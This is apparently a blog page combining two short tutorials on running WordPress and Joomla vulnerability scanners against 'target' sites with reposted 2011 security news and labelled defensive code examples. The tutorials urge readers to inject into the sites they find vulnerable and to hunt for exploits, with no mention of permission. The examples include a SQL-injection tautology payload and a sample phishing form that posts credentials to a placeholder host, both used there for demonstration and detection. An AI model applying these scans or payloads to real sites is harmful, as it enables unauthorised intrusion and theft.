[+] Wayc0de's Blog[+]


Tutorial: WordPress Scanning

Assalamu'alaikum and peace be upon us all
meeting me, the newbie, once again
this time I'll give a short tutorial on scanning WordPress and

without further ado, straight to the main topic


1. Download the WordPress scanner software here: wp-scan


-=- we are going to run the WordPress scanner

after downloading, extract the file first

open a terminal and type the following commands:

cd Downloads
perl wp-scan.pl target.com
ex : perl wp-scan.pl www.webhostingiix.com

once the scan finishes you can look at the results (the scan's progress is not shown there)
a report appears when it has finished; the results are in sqli-bugs.txt in the wp-scan folder

next you can carry out injection against the target

please wait until the scanning process has finished

it will list which ones are vuln

once all that is done, we just have to look for the exploit, folks

to find the exploit you can search anywhere

that's it for this humble tutorial from me

hope it's useful for all of us

final words from me, wassalam

NB: vba & ArRay

Tutorial: Joomla Web Scanner 1.7

Assalamu'alaikum and peace be upon us all

it's been a long time since I updated the blog

ok, straight to it: this time I'll give all my friends a little toy to play with

as the title says, "Joomla Web Scanner 1.7"

just from the title I'm sure you already understand what this tool is for


1. first download the tool: Joomla-Scan

2. after downloading, let's extract the file

3. then we will run the scanning process against the target

first let's look at the commands for this tool

type: ./joomlascan.pl -help

it will print something like this

[Image: joomla1.png]

Usage:  ./joomlascan.pl -u <joomla_url> [options]

    == Options ==
      -p <string:int>  = proxy:port
      -a               = Admin folder (default '/administration')
      -v               = Check version
      -c               = Check components
      -f               = Check firewall
      -co              = Check bugs in core (require -v)
      -cm              = Check bugs in components (require -c)
      -all             = Check all (default)
      -ot              = Output to text file
      -oh              = Output to html file
      -update          = Search for updates
      -force-update    = Force to download updates
      -about           = About joomlascan
      -version         = Print version info
      -h, -help        = This help

    == Examples ==
      To scan running joomla version and components:
         $./joomlascan.pl -u www.host.com -v -c

      To scan version and core bugs:
         $./joomlascan.pl -u www.host.com -v -co

4. time for action: type the following command

./joomlascan.pl -u www.target.com -v -co

wait until the scanning process finishes; have a smoke first, bro

when it's done the result will look like this

maybe that's enough for this humble tutorial from me

hope it's useful for all of us

final words from me, wassalam


Apple's iOS 5.0.1 is out - should you upgrade?

Apple's latest iOS update is out.

The new version bumps iOS5 up to 5.0.1, and is Apple's first OTA update.

OTA stands for "over-the-air", and means that you can download and apply the update directly from your iDevice.
You no longer need to download the entire firmware file to your computer - including yet another copy of everything which hasn't changed in iOS - and push it to your device.
(OTA updating isn't yet mandatory. If you prefer to keep full copies of each iOS firmware distro, you can still use the download-and-install-with-iTunes method.)

According to Apple, the highlights of the 5.0.1 update are that it:
* fixes bugs affecting battery life,
* adds Multitasking Gestures for the original iPad,
* resolves bugs with Documents in the Cloud, and
* improves voice recognition for Australian users using dictation.

Strewth! That last one's a bonzer boost for blokes and sheilas everywhere! Gives an Aussie something worth lifting a tinnie to after the Baggy Green got such a big hiding from the South Africans in the cricket!

Importantly, 5.0.1 also fixes a number of security flaws, including a remote code execution (RCE) vulnerability involving font handling, found by Erling Ellingsen of Facebook. RCE means that a cybercriminal might be able to trick your device into running software without asking you, even if you're just browsing the internet.

Interestingly, Charlie Miller's recent and controversial App Store hole has also been patched. Miller showed how to write an innocent-looking App which, once approved by Apple, could fetch and run unapproved software.

Miller was unceremoniously banned from the Apple Developer scene for at least a year; there's no word from Apple, however, on whether he'll be readmitted now the hole is fixed.

Jailbreakers will be pleased to note that devices suitable for running a jailbroken iOS5 - a list which sadly still excludes the iPhone 4S and the iPad 2 - can happily run a jailbroken iOS5.0.1.

If you are a jailbreaker, however, note that there is not yet any way to go back to iOS5.0 once you've moved on to 5.0.1.
That means that you'll never be able to use Charlie Miller's code-signing vulnerability for jailbreaking purposes in the future, for example if an iPad 2 jailbreak appears which relies on it.

And that leaves us with one question: should you update?
Some reports suggest that 5.0.1 brings with it a raft of new problems, and that the update might not, after all, fix your battery issues.

But these complaints are still anecdotal and unscientific, so if you trust Apple and you're not into jailbreaking, I'd suggest updating to 5.0.1 as soon as you conveniently can.

Ellingsen's and Miller's vulnerabilities may not have made it to Apple's highlights list, but each of these bugs on its own can be considered sufficiently important to warrant a prompt update.

Free Android antivirus software is 'useless,' says testing firm

The malware scanners from minor players typically catch less than 10 percent of malicious software

Consumers and workers who install free Android antivirus scanners from relatively unknown developers are mostly wasting their time, an independent testing firm has found. "During our tests, we found out that the majority of free products are -- to make it short -- useless," says Andreas Marx, CEO of AV-Test. Of all the major mobile platforms, Android is at most risk for malware.

The German firm tested seven free antivirus applications for the Android platform and found that the best program detected only one-third of resident malware, and all others detected less than 6 percent. The best performer, Zoner Antivirus Free, detected 8 of 10 malicious programs during installation, while the other applications detected at most 1 of the 10 malicious programs, according to the firm's analysis (PDF).

The company tested Zrgiu's Antivirus Free, BluePoint Antivirus Free, GuardX Antivirus, Kinetoo Malware Scan, LabMSF Antivirus beta, Privateer Lite, and Zoner AntiVirus Free. Four of the free antivirus programs did not detect any of the 172 resident malicious programs used as a test base; another detected only 2. The programs also had little success in detecting malware during installation, with three of the programs detecting no malware and three others detecting a single program. Zoner Antivirus Free was the only standout of the bunch, detecting 32 percent of resident malware and 80 percent of malware during installation.

The firm compared the results to antivirus offerings from established security firms F-Secure and Kaspersky, which detected more than 50 percent of resident malware and blocked all 10 malware samples during installation.

The company plans to widen the testing for its next report to include antivirus programs from commercial vendors as well.



Anonymous and LulzSec trawl Google Code search for security holes

Exotically named hacking tools such as Low Orbit Ion Cannon and #RefRef have garnered plenty of headlines over the last few months but a new report suggests that the world's favourite search engine might be an equally important weapon in the arsenal of cyber-criminals and hacktivists.

The report explains how a simple search on Google Code is all that's needed to uncover a wealth of information that can be used to break into websites, cloud-based services and secure networks.

Google's Code Search is a tool that makes it easy for those with technical know-how to search the vast amount of computer code that is publicly available online.

Researchers from IT security consultancy Stach & Liu report that hacking groups such as Anonymous and LulzSec are using Google Code search for a number of nefarious activities.

With a few well-crafted searches they can uncover passwords for cloud services, configuration files for Virtual Private Networks and find code that is vulnerable to common website hacking tactics such as SQL injection.

While the findings provide a much-needed wake up call to online businesses, admins and developers, they also offer a fascinating insight into the motivation of hacking collectives such as Anonymous and LulzSec.

According to Stach & Liu, ‘Google Hacking’, as the technique is known, is believed to be Anonymous and LulzSec’s primary means of identifying potential targets.
Rather than being motivated by politics or injustice, hacking groups may simply be targeting organisations because Google Code search has turned up a vulnerability too tempting to ignore, making them less political action groups, more malicious 21st century Wombles.

So what can online businesses do to protect themselves from these online, evil Uncle Bulgarias?

The first line of defence is to make sure that developers are following established best practice and that executives are creating a culture where best practice is encouraged and supported. Including passwords in code has always been a bad idea and techniques to prevent and detect SQL injection vulnerabilities are well established.

Businesses should also prepare so that if they are successfully attacked after a data leak they don't lose their shirt. Data stored in the cloud can be rendered useless to attackers by the simple expedient of encrypting it.
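The two coding practices the previous paragraphs point to, shown side by side as an added example (this is not code from the article or from Stach & Liu): a lookup built by string concatenation next to the same lookup with a bound parameter, and a small pattern check for credentials committed into source of the kind a pre-commit hook can run before code ever reaches a public repository. The database rows, the source lines and the key names in the pattern are all constructed for the example.

```python
"""Added example: parameterised queries and a hard-coded-credential check.

1. Parameterised queries: the unsafe function splices user input into the
   SQL text, so the input can change the query's structure; the safe
   function binds it as a parameter, so it is only ever data.
2. Hard-coded credentials: a pattern check over source lines, the kind of
   thing a pre-commit hook or CI job runs before a push.
"""
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data: three accounts in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "alice@example.test"),
         ("bob", "bob@example.test"),
         ("carol", "carol@example.test")],
    )
    return conn


def find_user_unsafe(conn, name: str) -> list:
    """Vulnerable form: the input becomes part of the SQL statement."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn, name: str) -> list:
    """Hardened form: the input is bound as a parameter, never parsed as SQL."""
    sql = "SELECT name, email FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# Key names that commonly carry a credential when a quoted literal follows.
# Assumption: this list is illustrative, not a complete secret-detection ruleset.
SECRET_PATTERN = re.compile(
    r"""(?i)(password|passwd|secret|api[_-]?key|token)\s*[=:]\s*['"][^'"]{4,}['"]"""
)


def find_hardcoded_secrets(lines: list) -> list:
    """Return (line_number, line) for each line that looks like a committed secret."""
    hits = []
    for number, line in enumerate(lines, start=1):
        if SECRET_PATTERN.search(line):
            hits.append((number, line.strip()))
    return hits


def demo() -> dict:
    """Run both checks and return the results so they can be asserted on."""
    conn = build_db()
    # A tautology in the name makes the concatenated WHERE clause always true,
    # so the unsafe lookup returns every row; the safe one returns none.
    probe = "x' OR '1'='1"
    sample_source = [  # constructed lines standing in for a committed config file
        "DB_HOST = 'db.internal'",
        "DB_PASSWORD = 'hunter2-changeme'",
        "timeout = 30",
        "api_key: \"sk_live_placeholder_0000\"",
        "# password = os.environ['DB_PASSWORD']  (correct: read from environment)",
    ]
    return {
        "unsafe_rows": len(find_user_unsafe(conn, probe)),
        "safe_rows": len(find_user_safe(conn, probe)),
        "secret_lines": [n for n, _ in find_hardcoded_secrets(sample_source)],
    }


if __name__ == "__main__":
    print(demo())
```

The last sample line shows the right pattern, reading the value from the environment, and the check correctly leaves it alone; the two quoted literals are the lines a reviewer would want flagged before they land in a searchable repository.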

Stach & Liu warn that businesses using cloud services should also take a close look at the small print; many cloud service providers state that they don't accept responsibility for leaks.

For more on this take a look at Stach & Liu's Pulp Google Hacking presentation.


Adobe says goodbye to Flash for mobile platforms

Adobe's product management team has sent a briefing to Adobe's partners describing the future direction of development for its multi-platform mobile application development tools.

From the security point of view, the biggest and the most welcome news is the announcement of the end of the development of Adobe Flash player for mobile platforms, except for critical security and bug fixes.

Unfortunately, even if the death of Flash for mobile platforms is imminent, Flash for desktop platforms is still very much alive. Adobe Flash vulnerabilities, together with Java virtual machine and Adobe Reader vulnerabilities, have been the most common causes for drive-by download malware infections.

It is yet uncertain what is the future of Flash on desktop, but let us hope that the widespread acceptance of HTML5 will drive Adobe in the right direction of killing Flash players on all remaining platforms.

The move comes after pressure from iPhone and iPad users, who have been frustrated at not being able to access websites built in Flash since Apple announced its decision to exclude Flash support from iOS-based devices.
Was Steve Jobs right about Flash after all?

Adobe, Apple, Microsoft & Mozilla Issue Critical Patches

Adobe, Apple, Microsoft and Mozilla all released updates on Tuesday to fix critical security flaws in their products. Adobe issued a patch that corrects four vulnerabilities in Shockwave Player, while Redmond pushed updates to address four Windows flaws. Apple slipped out an update that mends at least 17 security holes in its version of Java, and Mozilla issued yet another major Firefox release, Firefox 8.

The only “critical” patch from Microsoft this month is a dangerous Windows flaw that could be triggered remotely to install malicious software just by sending the target system specially crafted packets of data. Microsoft says this vulnerability may be difficult to reliably exploit, but it should be patched immediately. Information on the other three flaws fixed this week is here. The fixes are available via Windows Updates for most supported versions of the operating system, including XP, Vista and Windows 7.

Adobe’s Shockwave update also fixes critical flaws, but users should check to see if they have this program installed before trying to update it. To test whether you have Shockwave installed, visit this page; if you see an animation, it’s time to update. If you see a prompt to install Shockwave, there is no need to install it. Mozilla Firefox users without Shockwave Player installed may still see “Shockwave Flash” listed in the “Plugins” directory of the browser; this merely indicates that the user has Adobe’s Flash Player installed.

The vulnerabilities fixed by this update exist in versions of Shockwave and earlier. The latest version, v., is available here.  As I noted earlier this year, I haven’t had Shockwave on my system for some time now and don’t seem to have missed it. I’m sure it has its uses, but to me Shockwave is just another Adobe program that requires constant care and feeding. What’s more, like Adobe’s Flash Player, Shockwave demands two separate installation procedures for IE and non-IE browsers.

Hat tip to the SANS Internet Storm Center for the heads up on the Java fix from Apple. This update, available via Software Update or Apple Downloads, essentially brings Snow Leopard and Lion up to date with the Oracle patches released last month in Java 6 Update 29 (Apple maintains its own version of Java).

If you use Mozilla Firefox or Thunderbird, you may have noticed that Mozilla is pushing out another major upgrade that includes critical fixes to these programs; both have now been updated to version 8. If you’re still running Firefox version 3.6.x, Mozilla has updated that to 3.6.24 (if anyone can help decipher Mozilla’s timeline for exactly how long it will continue to support this workhorse version of Firefox, please drop a line in the comments below). Perhaps I’m becoming a curmudgeon, but I’m growing weary of the incessant update prompts from Firefox. It seems that almost every time I start it up it’s asking to restart the browser or to remove plugins that no longer work with the latest version. I’ve been gradually transitioning more of my work over to Google Chrome, which seems faster and updates the browser and any installed plugins silently (and frequently patches oft-targeted plugins like Flash Player even before Adobe officially releases the update).

Apple Bans Security Researcher Charlie Miller For Exposing iOS Exploit

The latest wave in the infosec world is that Apple has banned the well known security researcher – Charlie Miller – from its developer program for exposing a new iOS exploit.

It’s not really the smartest move as I’m pretty sure anyone as smart as Charlie Miller still has plenty of options – use another person’s account, sign up another account with a different identity, hack the phone without the developer program access and so on.

Really it’s quite a harsh move from Apple and it’s not going to make them any friends in the security industry.

Apple has banned well-known security researcher Charlie Miller from its developer program, for creating an apparently benign iOS app that was actually designed to exploit a security flaw he had uncovered in the firmware.

Within hours of talking about the exploit with Forbes’ security reporter Andy Greenberg, who published the details, Miller received an email from Apple: “This letter serves as notice of termination of the iOS Developer Program License Agreement … between you and Apple. Effective immediately.”

Based on Greenberg’s follow-up story, Apple was clearly within its rights to do so. Miller created a proof-of-concept application to demonstrate the security flaw and how it could be exploited by malicious code. He then hid it inside an apparently legitimate stock ticker program, an action that, according to Apple, “violated the developer agreement that forbid[s] him to ‘hide, misrepresent or obscure’ any part of his app,” Greenberg wrote.

He quoted Miller, who works for security consultancy Acuvant, “I’m mad. I report bugs to them all the time. Being part of the developer program helps me do that. They’re hurting themselves, and making my life harder.”

In a way though, you have to agree that Miller did violate the very specific developer program agreement by hiding the PoC inside a legitimate application. That probably wasn’t his smartest idea, but then again it’s helping Apple and he’s not doing it in a malicious way to infect people – he’s doing it as a security researcher.

Apple should be more proactive on working with people like this, people who are actually fixing bugs in their products for free and improving the user experience.

It’s the way Apple operates though, secretive, exclusive, domineering etc. If you don’t do things their way, screw you.

Miller, a former National Security Agency staffer, is a well-known “white hat” hacker (he made Network World’s recent list of “Security All Stars”), with expertise in Apple’s Mac OS X and iOS platforms, including the Safari browser, and in Android. Miller “has found and reported dozens of bugs to Apple in the last few years,” Greenberg noted. Miller reported the latest one barely three weeks ago, and it was Greenberg’s public account of it yesterday, in advance of a planned public presentation by Miller next week, that got the researcher kicked out of the developer program.

The vulnerability is a fascinating exercise in information security sleuthing. Miller uncovered a flaw introduced in Apple’s restrictions on code signing on iOS devices. Code signing is a process by which only Apple-approved commands run in device memory, according to Greenberg’s account.

Miller began to suspect a flaw when Apple released iOS 4.3 in March. He realized that to boost the speed of the mobile Safari browser, Apple for the first time had allowed JavaScript code from a website to run at a deeper level in memory. This entailed creating a security exception, allowing the browser to run unapproved code. According to Greenberg’s story, Apple created other security restrictions to block untrusted websites from exploiting this exception, so that only the browser could make use of it.

Miller wasn’t the only one to notice that Apple had done something different with Safari in iOS 4.3, but many didn’t understand what was actually happening. Various news sites and bloggers claimed that Web apps running outside of Safari, and its new Nitro JavaScript engine, were slower. Some suggested that Apple was deliberately slowing them down to make Web apps less attractive than native ones.

The way in which Miller uncovered the flaw once again shows his technical brilliance – something which Apple really should be harnessing rather than turning away.

A lot of people noticed changes with iOS 4.3, but couldn’t actually figure out what was going on. Well, that’s what we know in the public realm anyway; no doubt the bad guys had their eyes on it and were digging in with much more malicious exploits.

It basically seems like a way to bypass any kind of code validation by Apple and execute arbitrary code from an attack server – dangerous indeed.


Fresh Phish disguised as a PayPal Urgent Account Review Notification

[Image: No Phishing, Creative Commons photo courtesy of alex_lee2001's Flickr photostream]

While browsing the web this evening waiting for thotcon 0x3 general admission tickets to go on sale, my wife's spidey senses were tingling when she asked me, "Is this a scam?"

Turning towards her monitor I see she has an email open inside her webmail account. The email has a pretty good sense of urgency written into it that compels the reader to follow the instructions provided and protect their information.
[Image: PayPal phish]
It begins:
"As of the 3rd of November 2011, our security system has blocked unusual charges to a credit card linked to your account."
And concludes:
"Sincerely, PayPal Account Review Team"
Unfortunately, the average person who does not read Naked Security might easily be duped out of their PII (Personally Identifiable Information).

Phishing scams are nothing new. If people stopped falling for them, perhaps the phishing scams would stop?
It really comes down to education and great protection (for when education fails).

[Image: Mal/Phish-A Sophos Anti-Virus detection]

The home use version of Sophos Endpoint Security and Control did a fantastic job of catching the attack as Mal/Phish-A.

The home use version is available to Sophos customers' employees. Check with your employer whether the home use program is available at your organization before installing Sophos software willy-nilly.

I spoke earlier in the week with a security professional who sent 500 spear phishing attacks internally to his colleagues. Of the 500 emails sent, 25 people responded by completing the form and surrendering their information.
While a 5% rate may seem small, he felt even 1% was too high. Education helped a lot, but not completely. Do you agree?
When read, this fresh phish posing as PayPal immediately puts the recipient into an emotional state, believing that their account has been compromised and their funds are in jeopardy, which then clouds their judgement.

Since PayPal is a trusted name in the electronic payments industry, they of course have controls to prevent fraudulent transactions (but no one is perfect). This phish takes advantage of that trust by explaining that the breached account has been locked for your protection.

[Image: Attached HTML phish file]

Now to regain access to your funds it's imperative to download the attachment and complete the form.

After downloading and opening the attachment it will open your web browser. As you can see, this web page looks very genuine and might lower your guard into believing it really came from PayPal.
[Image: PayPal phishing site]

There are a few mistakes in this poorly executed phish which caused education to prevail over emotion.

The most basic one is that there isn't a PayPal email address associated with the inbox which received this phish.

Another one to point out is that the (From: "PayPal") is really not from PayPal.
The phisher used a domain name pp-redacted-.com which, based on a whois lookup, doesn't have anything to do with PayPal. It belongs to an instrumentation company out of Massachusetts that happens to have similar initials to PayPal.
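The three tells called out above (a display name claiming a brand whose domain the sender does not use, an HTML form delivered as an attachment, and urgency language) turned into a small triage check, as an added example that is not part of the original post. It uses only the Python standard library; the sample message, the placeholder sender domain pp-instruments.invalid (not the redacted domain from the post) and the list of known brand domains are all constructed for the example.

```python
"""Added example: apply the three phishing tells from the post to a raw message."""
from email import message_from_string, policy
from email.utils import parseaddr

# Constructed phish: the display name says PayPal, the sender domain does not,
# an HTML form travels as an attachment, and the body presses for urgency.
SAMPLE_PHISH = """\
From: "PayPal" <review@pp-instruments.invalid>
To: victim@example.test
Subject: Urgent Account Review Notification
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

As of the 3rd of November 2011, our security system has blocked unusual
charges to a credit card linked to your account. Download the attached
form and complete it to restore access.

Sincerely, PayPal Account Review Team
--b1
Content-Type: text/html; name="PayPal_Review.html"
Content-Disposition: attachment; filename="PayPal_Review.html"

<html><body><form action="http://203.0.113.10/collect" method="post">
<input name="card"><input name="password"></form></body></html>
--b1--
"""

# Brands the recipient does business with and the domains they legitimately mail from.
# Assumption: illustrative values; a real deployment would load these from policy.
KNOWN_SENDERS = {"paypal": {"paypal.com", "e.paypal.com"}}
URGENCY_WORDS = ("urgent", "blocked", "suspended", "immediately", "restore access")


def sender_domain(msg) -> str:
    """Domain of the address in the From: header, lower-cased ('' if absent)."""
    _, addr = parseaddr(str(msg.get("From", "")))
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def phish_indicators(raw: str) -> list:
    """Return a human-readable indicator for each tell found in the raw message."""
    msg = message_from_string(raw, policy=policy.default)
    found = []

    # 1. Display name claims a brand, but the sender domain is not one that brand uses.
    display, _ = parseaddr(str(msg.get("From", "")))
    domain = sender_domain(msg)
    for brand, domains in KNOWN_SENDERS.items():
        if brand in display.lower() and domain not in domains:
            found.append(f"display name '{display}' but sender domain '{domain}'")

    # 2. An HTML file shipped as an attachment (a form meant to be opened locally).
    for part in msg.iter_attachments():
        fname = (part.get_filename() or "").lower()
        if part.get_content_type() == "text/html" or fname.endswith((".htm", ".html")):
            found.append(f"HTML attachment '{fname}'")

    # 3. Urgency language in the subject or the plain-text body.
    body = msg.get_body(preferencelist=("plain",))
    text = (str(msg.get("Subject", "")) + " " + (body.get_content() if body else "")).lower()
    hits = [w for w in URGENCY_WORDS if w in text]
    if hits:
        found.append("urgency language: " + ", ".join(hits))
    return found


if __name__ == "__main__":
    for indicator in phish_indicators(SAMPLE_PHISH):
        print("-", indicator)
```

None of the three checks proves a message is a phish on its own; together they reproduce the gut feeling described in the post as something a mail filter or help desk can apply consistently, and the brand-to-domain table is where an organisation records which senders it actually trusts.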
While my wife isn't a security professional or an expert with computers, her education to not trust every email in her inbox (beyond spam) triggered a gut feeling to think more clearly.

If it doesn't feel right, then it's not. Go with your gut!
Until next time, stay safe and secure online.

Apple Security Chief Reportedly Leaves Company

Apple’s vice president of global security has reportedly stepped down roughly two months after news reports surfaced that an iPhone prototype had gone missing for the second time in less than two years.

According to reports, John Theriault, who came to Apple from Pfizer and was a former FBI agent, has retired in the wake of controversy regarding the device's disappearance and the subsequent efforts to track it down. Apple did not return a request for comment.

Nevertheless, Theriault’s departure follows a public relations dustup that began when an Apple employee left the prototype at a bar in San Francisco. The company's attempts to find the device led it to 22-year-old Sergio Calderon, who has said members of Apple's security team showed up at his home in San Francisco with police to search for the phone. According to Calderon, he only let the Apple investigators in because he thought they were police. However, the San Francisco Police Department - which initially denied involvement - has said that while there were officers at the scene, the search itself was conducted by the Apple employees.

The device, believed to have been a prototype of an iPhone 4S, was not found during the search. A lawyer for Calderon has reportedly threatened a lawsuit against Apple.

The latest case of the missing prototype echoes the disappearance of an iPhone 4 prototype in 2010. In that incident, an Apple employee left the phone at a bar called Gourmet Haus Staudt in Redwood City, Calif. When the phone was discovered, it was sold to the tech blog Gizmodo, which dissected the device and published pictures. This ultimately led investigators to raid the home of a Gizmodo editor. Two men were charged with selling the phone to Gizmodo and were sentenced to probation earlier this year. No one from Gizmodo was charged.

In the aftermath of the most recent incident, Apple was found to have posted job listings for a “product security manager” who would be responsible for “overseeing the protection of, and managing risks to, Apple’s unreleased products and related intellectual property.”

Open 'Facebook killer' survives on cash donations

Diaspora, the social network that sells itself as a privacy-conscious alternative to Facebook, is relying on user donations instead of advertising to get it going.

And by contrast to its other competitor, Google+, Diaspora also allows pseudonyms. The decentralised service aims to address some of the multitude of privacy and content control issues that have dogged Facebook and, arguably to a lesser extent, Google+, while still giving users the ability to share content and ideas with their friends online.

Users retain the copyright of uploaded photos and the like, which is only shared among groups that users actively define, not friends-of-friends or the whole network (often the default options on Facebook).

The service was launched in November 2010 and remains in alpha. However having signed up to try the invitation-only service months ago, El Reg finally received an invitation to try it on Thursday, so things appear to be moving (albeit slowly). The emailed invitation (extract below) was nothing if not enthusiastic:

Finally – it's here

The social network you have been waiting for has arrived. Revamped, more secure, and more fun, DIASPORA* is ready to help you share and explore the web in a whole new way.

Sign up now

Last month the developers behind the software – students at New York University's Courant Institute of Mathematical Sciences – began soliciting donations via PayPal. Diaspora's account was frozen for a short while by the eBay-owned payments biz, without explanation, but has since been restored. The site added other donation methods, including Bitcoin, following the episode.

Once signed up to Diaspora, users are immediately invited to link their Diaspora and Facebook accounts to "speed things up a bit" and "enable cross-posting".

This may help populate a profile, but we can't help thinking that linking to Facebook creates privacy concerns all by itself and runs against Diaspora's aims to make "privacy controls both clear and straightforward". You can also add links between Diaspora and Twitter accounts or import contacts from email accounts into Diaspora.

Users are invited to use #hashtags to classify posts and find people who share their interests. They are presented with a "stream" populated with all of their contacts, tags they follow, and "posts from some creative members of the community" who have apparently chosen to share comments, video clips and pictures with everyone on the network. Contents are arranged in "aspects" – friends, family, work colleagues etc – on the site.

There's a lot of help for newbies as well as the facility to ask questions. The interface is clean and well-designed, perhaps partly because there's only one application on offer, Cubbi.es, which offers a way to collate photos. There's also a messaging feature. Overall the web interface is much closer in look and feel to Twitter than Facebook.

The site is usable but still a work in progress, as its alpha designation implies. Upcoming features promised include an ability for users to export their data and to create communities.

Diaspora is based on open-source technology. Early versions of its code were riddled with all manner of security holes, so cautious progress towards a full launch - adopting the open-source ethos of quickly fixing bugs as and when they arise - may be just as well.

There are also capacity management issues to think about: after all, it's a site run on a modest budget, partially helped by T-shirt sales, and running as a not-for-profit concern.


Anonymous abandons plan to expose Mexican drug cartel collaborators

Hacker group backs away from exposing people it believes are connected to Zetas cartel after alleged threat of killings

A plan by the international hacker movement Anonymous to expose collaborators of Mexico's notorious Zetas drugs cartel has come to an abrupt end. A US activist backed away from publishing the names after an alleged counter-threat of mass retaliatory killings.

"This moves the operation from being a risk to knowing that I would be murdering people," Anonymous participant Barrett Brown told the Guardian on Friday.

Brown's withdrawal from Operation Cartel puts an end to one of the most bizarre and confusing episodes in Mexico's drug wars.

It began with a video which appeared online in early October and promised to reveal the identities of people working with the Zetas unless the cartel released an Anonymous member kidnapped in the Mexican city of Veracruz.

The video prompted furious online debate: while Anonymous has previously targeted business and government websites and databases around the world, it was unclear how it could confront Mexico's amorphous – and deadly – drug trafficking organisations. Conflicting messages appeared on Twitter and other social networking sites, with some activists saying the operation had been cancelled while others pledged to continue.

This culminated in Mexico on Thursday when Spanish-speaking Anonymous participants, who had previously pledged to continue, announced that the Zetas had let the kidnapped member go.

They also said that she carried with her a message from the cartel threatening to kill 10 people for every person named and that they had decided to abandon their plans.

Brown, a prominent Texas-based activist and one of the few willing to be named, initially said Mexican hackers had promised to give him information on Zeta collaborators that they had taken from Mexican government sites and that it would be released in the next few days.

But while he said he was comfortable with running personal risks and "passing a death sentence" on those he identified, the wider retaliation threat had made him "rethink my position".

He added that Anonymous would continue to explore ways of using the internet to help spark some kind of mass response to "the near collapse" in Mexico, as he claims it did in Tunisia and Egypt.

New Mac Malware Variants Found in Trojaned Apps Are Stealing Data

Mac trojanResearchers have discovered a series of variants of the DevilRobber Mac OS X Trojan that have a menu of different capabilities, depending upon the strain, and can not only mine Bitcoins using the infected machine's processing power, but also steals files, installs a Web proxy and may steal the user's Safari browsing history.

The new variants of DevilRobber, which has been making the rounds recently, each appear to have a different set of capabilities because they may each have been built for specific jobs, according to an analysis of the malware by researchers at F-Secure. Some of the variants appear to be looking for specific pornographic files on infected Macs and steal passwords from the machine in order to access any files that may be protected. All of the variants of DevilRobber have the ability to take data from the machine and upload it to a remote server.
The new variants were discovered in legitimate Mac applications that had been Trojaned and then shared on Pirate Bay.

"The specific port used by the web proxy depends on the variant. The specific FTP server for data stealing also varies between samples. And DevilRobber's data stealing routine is repeated on a fixed interval — every 43200, 60000, or 100000 seconds, depending on the sample," F-Secure says in its analysis.
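As an added example, not code from the article or from F-Secure: a small Python detector that groups outbound FTP connections per source/destination pair and flags flows whose inter-connection gaps match one of the three fixed upload intervals quoted above. The log lines, the IP addresses and the 2% jitter tolerance are constructed assumptions.

```python
"""Added example (not from the article or F-Secure): flag hosts whose
outbound FTP connections recur at one of the fixed DevilRobber upload
intervals quoted above. Log lines and addresses are constructed."""
from collections import defaultdict
from datetime import datetime

# Fixed exfiltration periods named in the F-Secure analysis, in seconds.
DEVILROBBER_PERIODS = (43200, 60000, 100000)
TOLERANCE = 0.02  # assumed: allow 2% jitter between consecutive uploads

# Constructed firewall log: "<ISO timestamp> <src> -> <dst>:<port>"
SAMPLE_LOG = """\
2011-11-01T00:00:00 10.0.0.5 -> 203.0.113.9:21
2011-11-01T03:10:00 10.0.0.5 -> 198.51.100.20:21
2011-11-01T12:00:05 10.0.0.5 -> 203.0.113.9:21
2011-11-01T16:40:00 10.0.0.5 -> 198.51.100.20:21
2011-11-02T00:00:10 10.0.0.5 -> 203.0.113.9:21
2011-11-02T12:00:00 10.0.0.5 -> 203.0.113.9:21
"""

def parse_log(text):
    """Group FTP (port 21) connection timestamps by (src, dst) pair."""
    conns = defaultdict(list)
    for line in text.splitlines():
        ts, src, _, dst = line.split()
        host, port = dst.rsplit(":", 1)
        if port == "21":
            conns[(src, host)].append(datetime.fromisoformat(ts))
    return conns

def matching_period(gaps):
    """Return the known period that every gap matches, else None."""
    for period in DEVILROBBER_PERIODS:
        if gaps and all(abs(g - period) <= period * TOLERANCE for g in gaps):
            return period
    return None

def find_periodic_uploads(text, min_events=3):
    """Return {(src, dst): period} for flows beaconing at a known period."""
    hits = {}
    for key, times in parse_log(text).items():
        if len(times) < min_events:
            continue  # too few connections to call the flow periodic
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = matching_period(gaps)
        if period is not None:
            hits[key] = period
    return hits
```

On the constructed log only the flow to 203.0.113.9 is flagged, at the 43200-second period; the two connections to 198.51.100.20 are too few to judge.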

Mac malware has been making some headlines in the last few months, as attackers have begun applying to OS X some of the tactics they've been using on Windows for decades. In September, a Trojan called Imuler was found packed inside malicious PDFs, a trick that attackers have been using to get their malware into the hands of users for years now. And earlier in the year the MacDefender malware made a big splash as the first Mac-specific rogue antivirus program to emerge.

Apple is beginning to take some steps to address the threats facing its users, including the announcement this week that all apps submitted to the Mac App Store will have to have a sandbox by March 2012.


Zero-Day Exploit Used for DUQU

We have been closely monitoring developments on the DUQU malware since our initial blog post when the threat broke the news. And just recently, the Hungary-based security laboratory that initially reported about DUQU released more information that sheds more light into the nature of the said threat.

Their report indicates that a Microsoft Word document that triggers a zero-day kernel exploit was identified as the dropper for DUQU. Upon successful exploitation, the Microsoft Word file drops the installer files that load the DUQU components that were initially reported a couple of weeks back.

The installer files are composed of a .SYS file detected as RTKT_DUQU.B, and a .DLL file detected as TROJ_DUQU.B. RTKT_DUQU.B loads TROJ_DUQU.B into the system. TROJ_DUQU.B, on the other hand, drops and decrypts the DUQU components, RTKT_DUQU.A, TROJ_DUQU.ENC, and TROJ_DUQU.CFG. Below is a simple behavior diagram of the threat.

Details regarding the zero-day exploit used have not yet been disclosed. However, Microsoft is expected to release information on it soon. As a member of the Microsoft Active Protections Program (MAPP), if Microsoft provides information on ways we can protect customers while a security patch is being developed, we will add these protections to our products as quickly as possible and update you with that information.

